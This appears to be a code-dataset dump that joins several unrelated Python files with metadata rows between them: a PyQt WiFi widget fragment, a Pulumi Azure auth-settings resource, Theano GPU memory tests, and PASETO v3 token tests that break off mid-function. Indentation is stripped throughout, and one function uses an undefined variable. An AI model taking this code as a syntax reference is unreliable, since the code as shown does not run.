" border-width: 1px;\n"
" border-radius: 6px;\n"
" background-color: rgb(48, 131, 251);\n"
" color: rgb(255, 255, 255);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" border-color: rgb(164, 205, 255);\n"
" border-radius: 6px;\n"
" border-width: 3px;\n"
" border-style: solid;\n"
"}"))
self.repair.setObjectName(_fromUtf8("repair"))
self.verticalLayout.addWidget(self.repair)
self.wifiLayout.addWidget(self.frame)
self.horizontalLayout_2.addWidget(self.wifiLevel)
self.retranslateUi(WifiStatus)
QtCore.QObject.connect(self.wifiLevel, QtCore.SIGNAL(_fromUtf8("clicked(bool)")), self.frame.setVisible)
QtCore.QMetaObject.connectSlotsByName(WifiStatus)
def retranslateUi(self, WifiStatus):
WifiStatus.setWindowTitle(_translate("WifiStatus", "Form", None))
self.wifiLevel.setTitle(_translate("WifiStatus", "WiFi", None))
self.repair.setText(_translate("WifiStatus", "Repair", None))
from aui.mi.visual import CProgressBar
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
WifiStatus = QtGui.QWidget()
ui = Ui_WifiStatus()
ui.setupUi(WifiStatus)
WifiStatus.show()
sys.exit(app.exec_())
| 40.054688
| 112
| 0.694363
|
4a146ded64da613fdda3e66fe72debc785bd038b
| 28,092
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ._enums import *
__all__ = ['WebAppAuthSettingsSlot']
class WebAppAuthSettingsSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_login_params: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_audiences: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_external_redirect_urls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_id: Optional[pulumi.Input[str]] = None,
client_secret: Optional[pulumi.Input[str]] = None,
client_secret_certificate_thumbprint: Optional[pulumi.Input[str]] = None,
default_provider: Optional[pulumi.Input['BuiltInAuthenticationProvider']] = None,
enabled: Optional[pulumi.Input[bool]] = None,
facebook_app_id: Optional[pulumi.Input[str]] = None,
facebook_app_secret: Optional[pulumi.Input[str]] = None,
facebook_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
google_client_id: Optional[pulumi.Input[str]] = None,
google_client_secret: Optional[pulumi.Input[str]] = None,
google_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
issuer: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
microsoft_account_client_id: Optional[pulumi.Input[str]] = None,
microsoft_account_client_secret: Optional[pulumi.Input[str]] = None,
microsoft_account_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runtime_version: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
token_refresh_extension_hours: Optional[pulumi.Input[float]] = None,
token_store_enabled: Optional[pulumi.Input[bool]] = None,
twitter_consumer_key: Optional[pulumi.Input[str]] = None,
twitter_consumer_secret: Optional[pulumi.Input[str]] = None,
unauthenticated_client_action: Optional[pulumi.Input['UnauthenticatedClientAction']] = None,
validate_issuer: Optional[pulumi.Input[bool]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Configuration settings for the Azure App Service Authentication / Authorization feature.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_login_params: Login parameters to send to the OpenID Connect authorization endpoint when
a user logs in. Each parameter must be in the form "key=value".
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_audiences: Allowed audience values to consider when validating JWTs issued by
Azure Active Directory. Note that the <code>ClientID</code> value is always considered an
allowed audience, regardless of this setting.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_external_redirect_urls: External URLs that can be redirected to as part of logging in or logging out of the app. Note that the query string part of the URL is ignored.
This is an advanced setting typically only needed by Windows Store application backends.
Note that URLs within the current domain are always implicitly allowed.
:param pulumi.Input[str] client_id: The Client ID of this relying party application, known as the client_id.
This setting is required for enabling OpenID Connection authentication with Azure Active Directory or
other 3rd party OpenID Connect providers.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
:param pulumi.Input[str] client_secret: The Client Secret of this relying party application (in Azure Active Directory, this is also referred to as the Key).
This setting is optional. If no client secret is configured, the OpenID Connect implicit auth flow is used to authenticate end users.
Otherwise, the OpenID Connect Authorization Code Flow is used to authenticate end users.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
:param pulumi.Input[str] client_secret_certificate_thumbprint: An alternative to the client secret, that is the thumbprint of a certificate used for signing purposes. This property acts as
a replacement for the Client Secret. It is also optional.
:param pulumi.Input['BuiltInAuthenticationProvider'] default_provider: The default authentication provider to use when multiple providers are configured.
This setting is only needed if multiple providers are configured and the unauthenticated client
action is set to "RedirectToLoginPage".
:param pulumi.Input[bool] enabled: <code>true</code> if the Authentication / Authorization feature is enabled for the current app; otherwise, <code>false</code>.
:param pulumi.Input[str] facebook_app_id: The App ID of the Facebook app used for login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[str] facebook_app_secret: The App Secret of the Facebook app used for Facebook Login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[Sequence[pulumi.Input[str]]] facebook_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Facebook Login authentication.
This setting is optional.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[str] google_client_id: The OpenID Connect Client ID for the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[str] google_client_secret: The client secret associated with the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[Sequence[pulumi.Input[str]]] google_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Google Sign-In authentication.
This setting is optional. If not specified, "openid", "profile", and "email" are used as default scopes.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[str] issuer: The OpenID Connect Issuer URI that represents the entity which issues access tokens for this application.
When using Azure Active Directory, this value is the URI of the directory tenant, e.g. https://sts.windows.net/{tenant-guid}/.
This URI is a case-sensitive identifier for the token issuer.
More information on OpenID Connect Discovery: http://openid.net/specs/openid-connect-discovery-1_0.html
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] microsoft_account_client_id: The OAuth 2.0 client ID that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
:param pulumi.Input[str] microsoft_account_client_secret: The OAuth 2.0 client secret that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
:param pulumi.Input[Sequence[pulumi.Input[str]]] microsoft_account_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Microsoft Account authentication.
This setting is optional. If not specified, "wl.basic" is used as the default scope.
Microsoft Account Scopes and permissions documentation: https://msdn.microsoft.com/en-us/library/dn631845.aspx
:param pulumi.Input[str] name: Name of web app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] runtime_version: The RuntimeVersion of the Authentication / Authorization feature in use for the current app.
The setting in this value can control the behavior of certain features in the Authentication / Authorization module.
:param pulumi.Input[str] slot: Name of web app slot. If not specified then will default to production slot.
:param pulumi.Input[float] token_refresh_extension_hours: The number of hours after session token expiration that a session token can be used to
call the token refresh API. The default is 72 hours.
:param pulumi.Input[bool] token_store_enabled: <code>true</code> to durably store platform-specific security tokens that are obtained during login flows; otherwise, <code>false</code>.
The default is <code>false</code>.
:param pulumi.Input[str] twitter_consumer_key: The OAuth 1.0a consumer key of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
:param pulumi.Input[str] twitter_consumer_secret: The OAuth 1.0a consumer secret of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
:param pulumi.Input['UnauthenticatedClientAction'] unauthenticated_client_action: The action to take when an unauthenticated client attempts to access the app.
:param pulumi.Input[bool] validate_issuer: Gets a value indicating whether the issuer should be a valid HTTPS url and be validated as such.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['additional_login_params'] = additional_login_params
__props__['allowed_audiences'] = allowed_audiences
__props__['allowed_external_redirect_urls'] = allowed_external_redirect_urls
__props__['client_id'] = client_id
__props__['client_secret'] = client_secret
__props__['client_secret_certificate_thumbprint'] = client_secret_certificate_thumbprint
__props__['default_provider'] = default_provider
__props__['enabled'] = enabled
__props__['facebook_app_id'] = facebook_app_id
__props__['facebook_app_secret'] = facebook_app_secret
__props__['facebook_o_auth_scopes'] = facebook_o_auth_scopes
__props__['google_client_id'] = google_client_id
__props__['google_client_secret'] = google_client_secret
__props__['google_o_auth_scopes'] = google_o_auth_scopes
__props__['issuer'] = issuer
__props__['kind'] = kind
__props__['microsoft_account_client_id'] = microsoft_account_client_id
__props__['microsoft_account_client_secret'] = microsoft_account_client_secret
__props__['microsoft_account_o_auth_scopes'] = microsoft_account_o_auth_scopes
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['runtime_version'] = runtime_version
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
__props__['token_refresh_extension_hours'] = token_refresh_extension_hours
__props__['token_store_enabled'] = token_store_enabled
__props__['twitter_consumer_key'] = twitter_consumer_key
__props__['twitter_consumer_secret'] = twitter_consumer_secret
__props__['unauthenticated_client_action'] = unauthenticated_client_action
__props__['validate_issuer'] = validate_issuer
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/latest:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppAuthSettingsSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppAuthSettingsSlot, __self__).__init__(
'azure-nextgen:web/v20190801:WebAppAuthSettingsSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppAuthSettingsSlot':
"""
Get an existing WebAppAuthSettingsSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppAuthSettingsSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalLoginParams")
def additional_login_params(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Login parameters to send to the OpenID Connect authorization endpoint when
a user logs in. Each parameter must be in the form "key=value".
"""
return pulumi.get(self, "additional_login_params")
@property
@pulumi.getter(name="allowedAudiences")
def allowed_audiences(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Allowed audience values to consider when validating JWTs issued by
Azure Active Directory. Note that the <code>ClientID</code> value is always considered an
allowed audience, regardless of this setting.
"""
return pulumi.get(self, "allowed_audiences")
@property
@pulumi.getter(name="allowedExternalRedirectUrls")
def allowed_external_redirect_urls(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
External URLs that can be redirected to as part of logging in or logging out of the app. Note that the query string part of the URL is ignored.
This is an advanced setting typically only needed by Windows Store application backends.
Note that URLs within the current domain are always implicitly allowed.
"""
return pulumi.get(self, "allowed_external_redirect_urls")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> pulumi.Output[Optional[str]]:
"""
The Client ID of this relying party application, known as the client_id.
This setting is required for enabling OpenID Connection authentication with Azure Active Directory or
other 3rd party OpenID Connect providers.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The Client Secret of this relying party application (in Azure Active Directory, this is also referred to as the Key).
This setting is optional. If no client secret is configured, the OpenID Connect implicit auth flow is used to authenticate end users.
Otherwise, the OpenID Connect Authorization Code Flow is used to authenticate end users.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter(name="clientSecretCertificateThumbprint")
def client_secret_certificate_thumbprint(self) -> pulumi.Output[Optional[str]]:
"""
An alternative to the client secret, that is the thumbprint of a certificate used for signing purposes. This property acts as
a replacement for the Client Secret. It is also optional.
"""
return pulumi.get(self, "client_secret_certificate_thumbprint")
@property
@pulumi.getter(name="defaultProvider")
def default_provider(self) -> pulumi.Output[Optional[str]]:
"""
The default authentication provider to use when multiple providers are configured.
This setting is only needed if multiple providers are configured and the unauthenticated client
action is set to "RedirectToLoginPage".
"""
return pulumi.get(self, "default_provider")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
<code>true</code> if the Authentication / Authorization feature is enabled for the current app; otherwise, <code>false</code>.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="facebookAppId")
def facebook_app_id(self) -> pulumi.Output[Optional[str]]:
"""
The App ID of the Facebook app used for login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_app_id")
@property
@pulumi.getter(name="facebookAppSecret")
def facebook_app_secret(self) -> pulumi.Output[Optional[str]]:
"""
The App Secret of the Facebook app used for Facebook Login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_app_secret")
@property
@pulumi.getter(name="facebookOAuthScopes")
def facebook_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Facebook Login authentication.
This setting is optional.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_o_auth_scopes")
@property
@pulumi.getter(name="googleClientId")
def google_client_id(self) -> pulumi.Output[Optional[str]]:
"""
The OpenID Connect Client ID for the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_client_id")
@property
@pulumi.getter(name="googleClientSecret")
def google_client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The client secret associated with the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_client_secret")
@property
@pulumi.getter(name="googleOAuthScopes")
def google_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Google Sign-In authentication.
This setting is optional. If not specified, "openid", "profile", and "email" are used as default scopes.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_o_auth_scopes")
@property
@pulumi.getter
def issuer(self) -> pulumi.Output[Optional[str]]:
"""
The OpenID Connect Issuer URI that represents the entity which issues access tokens for this application.
When using Azure Active Directory, this value is the URI of the directory tenant, e.g. https://sts.windows.net/{tenant-guid}/.
This URI is a case-sensitive identifier for the token issuer.
More information on OpenID Connect Discovery: http://openid.net/specs/openid-connect-discovery-1_0.html
"""
return pulumi.get(self, "issuer")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="microsoftAccountClientId")
def microsoft_account_client_id(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 2.0 client ID that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
"""
return pulumi.get(self, "microsoft_account_client_id")
@property
@pulumi.getter(name="microsoftAccountClientSecret")
def microsoft_account_client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 2.0 client secret that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
"""
return pulumi.get(self, "microsoft_account_client_secret")
@property
@pulumi.getter(name="microsoftAccountOAuthScopes")
def microsoft_account_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Microsoft Account authentication.
This setting is optional. If not specified, "wl.basic" is used as the default scope.
Microsoft Account Scopes and permissions documentation: https://msdn.microsoft.com/en-us/library/dn631845.aspx
"""
return pulumi.get(self, "microsoft_account_o_auth_scopes")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="runtimeVersion")
def runtime_version(self) -> pulumi.Output[Optional[str]]:
"""
The RuntimeVersion of the Authentication / Authorization feature in use for the current app.
The setting in this value can control the behavior of certain features in the Authentication / Authorization module.
"""
return pulumi.get(self, "runtime_version")
@property
@pulumi.getter(name="tokenRefreshExtensionHours")
def token_refresh_extension_hours(self) -> pulumi.Output[Optional[float]]:
"""
The number of hours after session token expiration that a session token can be used to
call the token refresh API. The default is 72 hours.
"""
return pulumi.get(self, "token_refresh_extension_hours")
@property
@pulumi.getter(name="tokenStoreEnabled")
def token_store_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
<code>true</code> to durably store platform-specific security tokens that are obtained during login flows; otherwise, <code>false</code>.
The default is <code>false</code>.
"""
return pulumi.get(self, "token_store_enabled")
@property
@pulumi.getter(name="twitterConsumerKey")
def twitter_consumer_key(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 1.0a consumer key of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
"""
return pulumi.get(self, "twitter_consumer_key")
@property
@pulumi.getter(name="twitterConsumerSecret")
def twitter_consumer_secret(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 1.0a consumer secret of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
"""
return pulumi.get(self, "twitter_consumer_secret")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="unauthenticatedClientAction")
def unauthenticated_client_action(self) -> pulumi.Output[Optional[str]]:
"""
The action to take when an unauthenticated client attempts to access the app.
"""
return pulumi.get(self, "unauthenticated_client_action")
@property
@pulumi.getter(name="validateIssuer")
def validate_issuer(self) -> pulumi.Output[Optional[bool]]:
"""
Gets a value indicating whether the issuer should be a valid HTTPS url and be validated as such.
"""
return pulumi.get(self, "validate_issuer")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 58.647182
| 706
| 0.69041
|
4a146f4fe3df7bbe0bc1aff305b25f7c5aaefed4
| 7,042
|
py
|
Python
|
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | 1
|
2019-01-26T01:53:46.000Z
|
2019-01-26T01:53:46.000Z
|
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | null | null | null |
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | null | null | null |
import gc
import numpy as np
import theano
from theano import tensor
from theano.sandbox import cuda
from theano import ifelse
# Skip test if cuda_ndarray is not available.
from nose.plugins.skip import SkipTest
if cuda.cuda_available == False:
raise SkipTest('Optional package cuda disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpu')
else:
mode_with_gpu = theano.compile.mode.get_default_mode().including('gpu')
def freemem(extra_alloc=0):
"""
Return the free memory on the gpu in megabytes.
"""
gc.collect()
gc.collect()
gc.collect()
n_mallocs = cuda.cuda_ndarray.cuda_ndarray.outstanding_mallocs()
if hasattr(cuda.cuda_ndarray.cuda_ndarray, "theano_allocated"):
theano_alloc = cuda.cuda_ndarray.cuda_ndarray.theano_allocated()
return ("(n malloc/theano mem allocated in KB)",
n_mallocs + extra_alloc,
int(theano_alloc / 1024) + extra_size)
return ("n malloc on the gpu", n_mallocs + extra_alloc)
# I don't use the following by default as if there is other stuff running
# on the GPU, this won't work.
mem_info = cuda.cuda_ndarray.cuda_ndarray.mem_info()
gpu_used = (mem_info[1] - mem_info[0]) / 1024 ** 2
mem_info_msg = "(n malloc/gpu mem used in MB)"
return (mem_info_msg, n_mallocs, int(gpu_used))
def test_memory():
"""
We test that we do not keep link to memory between Theano function call
and during Theano compilation
The origin of this code come from Aaron Vandenoord and Sander Dieleman.
I have their autorisation to put this in Theano with the Theano license.
note::
This test can fail if there is other process running on the gpu.
"""
shapes = (200, 100)
# more_alloc1 and more_alloc2 is not the same for both dtype.
# when dtype is float32, the computation is done on the gpu.
# This insert constant on the gpu during compilation
# that raise the number of alloc.
# When dtype is float64, only the shared is on the gpu and it is transferd
# to the cpu for computation. So no extra alloc after compilation.
# more_alloc1 if after the first compilation, more_alloc2 after the second.
for dtype, more_alloc1, more_alloc2 in [("float32", 1, 4),
("float64", 0, 0)]:
print dtype
test_params = np.asarray(np.random.randn(np.prod(shapes)), dtype)
some_vector = tensor.vector('some_vector', dtype=dtype)
some_matrix = some_vector.reshape(shapes)
mem1 = freemem()
print "Before shared variable", mem1
variables = cuda.shared_constructor(np.ones((shapes[1],),
dtype='float32'))
derp = tensor.sum(tensor.dot(some_matrix[:shapes[0]], variables))
print "Shared took ", np.prod(variables.get_value(
borrow=True,
return_internal_type=True).shape) * 4 / 1024, "kB"
mem2 = freemem()
print "Before compilation", mem2
mem2_1 = freemem(extra_alloc=more_alloc1)
mem2_2 = freemem(extra_alloc=more_alloc2)
obj = theano.function([some_vector], derp, mode=mode_with_gpu)
mem3 = freemem()
print "After function compilation 1", mem3
assert mem2_1 == mem3, (mem2_1, mem3)
grad_derp = tensor.grad(derp, some_vector)
grad = theano.function([some_vector], grad_derp, mode=mode_with_gpu)
mem4 = freemem()
print "After function compilation 2", mem4
assert mem2_2 == mem4, (mem2_2, mem4)
for i in range(3):
obj(test_params)
print "After function evaluation 1", freemem()
assert mem2_2 == freemem(), (mem2_2, freemem())
grad(test_params)
print "After function evaluation 2", freemem()
assert mem2_2 == freemem(), (mem2_2, freemem())
del obj
#print "After deleting function 1", freemem()
#assert mem2 == freemem(), (mem2, freemem())
del grad
print "After deleting function 2", freemem()
assert mem2 == freemem(), (mem2, freemem())
del derp, variables, grad_derp
print "After deleting shared variable and ref to it", freemem()
assert mem1 == freemem(), (mem1, freemem())
def test_memory_lazy():
"""As test_memory, but with the ifelse op.
We need to test it as the ifelse op with the [c]vm create op not
executed in the graph. This mess with [c]vm gc implementation.
"""
shapes = (50, 100)
# more_alloc1 and more_alloc2 is not the same for both dtype.
# when dtype is float32, the computation is done on the gpu.
# This insert constant on the gpu during compilation
# that raise the number of alloc.
# When dtype is float64, only the shared is on the gpu and it is transferd
# to the cpu for computation. So no extra alloc after compilation.
# more_alloc1 if after the first compilation, more_alloc2 after the second.
for dtype, more_alloc1 in [("float32", 2),
("float64", 0)]:
print dtype
test_params = np.asarray(np.random.randn(np.prod(shapes)), dtype)
some_vector = tensor.vector('some_vector', dtype=dtype)
some_matrix = some_vector.reshape(shapes)
branch_select = tensor.iscalar()
mem1 = freemem()
print "Before shared variable", mem1
variables = cuda.shared_constructor(np.ones((shapes[1],),
dtype='float32'))
derp = tensor.sum(tensor.dot(some_matrix[:shapes[0]], variables))
derp = ifelse.IfElse(1)(branch_select,
derp, some_matrix[:shapes[0]].sum())
derp += 1
print "Shared took ", np.prod(variables.get_value(
borrow=True,
return_internal_type=True).shape) * 4 / 1024, "kB"
mem2 = freemem()
print "Before compilation", mem2
mem2_1 = freemem(extra_alloc=more_alloc1)
obj = theano.function([some_vector, branch_select], derp,
mode=mode_with_gpu)
#theano.printing.debugprint(obj, print_type=True)
mem3 = freemem()
print "After function compilation 1", mem3
assert mem2_1 == mem3, (mem2_1, mem3)
for i in range(3):
obj(test_params, 1)
print "After function evaluation branch true", freemem()
assert mem2_1 == freemem(), (mem2_1, freemem())
obj(test_params, 0)
print "After function evaluation branch false", freemem()
assert mem2_1 == freemem(), (mem2_1, freemem())
del obj
print "After deleting function 1", freemem()
assert mem2 == freemem(), (mem2, freemem())
del derp, variables
print "After deleting shared variable and ref to it", freemem()
assert mem1 == freemem(), (mem1, freemem())
| 39.561798
| 79
| 0.627237
|
4a146fb799806b4ec13e6740eb0c6107a2c44522
| 2,354
|
py
|
Python
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 93
|
2018-03-10T17:15:06.000Z
|
2022-03-28T09:36:09.000Z
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 15
|
2018-03-09T16:21:32.000Z
|
2021-09-17T17:20:51.000Z
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 13
|
2018-03-09T15:50:01.000Z
|
2022-03-28T09:59:18.000Z
|
import json
import pytest
import paseto
from unittest import mock
from paseto.protocols.v3 import ProtocolVersion3
from paseto.keys.asymmetric_key import AsymmetricSecretKey, AsymmetricPublicKey
from paseto.keys.symmetric_key import SymmetricKey
import secrets
def test_v3_local_keygen():
test_v3_local_key = ProtocolVersion3.generate_symmetric_key()
assert test_v3_local_key.protocol is ProtocolVersion3
def test_v3_public_keygen():
test_v3_public_secret_key = ProtocolVersion3.generate_asymmetric_secret_key()
assert test_v3_public_secret_key.protocol is ProtocolVersion3
test_v3_public_public_key = test_v3_public_secret_key.get_public_key()
assert test_v3_public_public_key.protocol is ProtocolVersion3
def test_create_local():
test_v3_local_key = ProtocolVersion3.generate_symmetric_key()
token = paseto.create(
key=test_v3_local_key,
claims={"test": [1, 2, 3]},
purpose="local",
exp_seconds=100,
footer="hello",
)
assert token is not None
assert token.startswith("v3.")
parsed = paseto.parse(test_v3_local_key, token)
assert parsed
def test_create_public():
test_v3_public_secret_key = ProtocolVersion3.generate_asymmetric_secret_key()
test_v3_public_public_key = test_v3_public_secret_key.get_public_key()
token = paseto.create(
key=test_v3_public_secret_key,
claims={"test": [1, 2, 3]},
purpose="public",
exp_seconds=100,
footer="hello",
)
assert token is not None
assert token.startswith("v3.")
parsed = paseto.parse(key=test_v3_public_public_key, token=token)
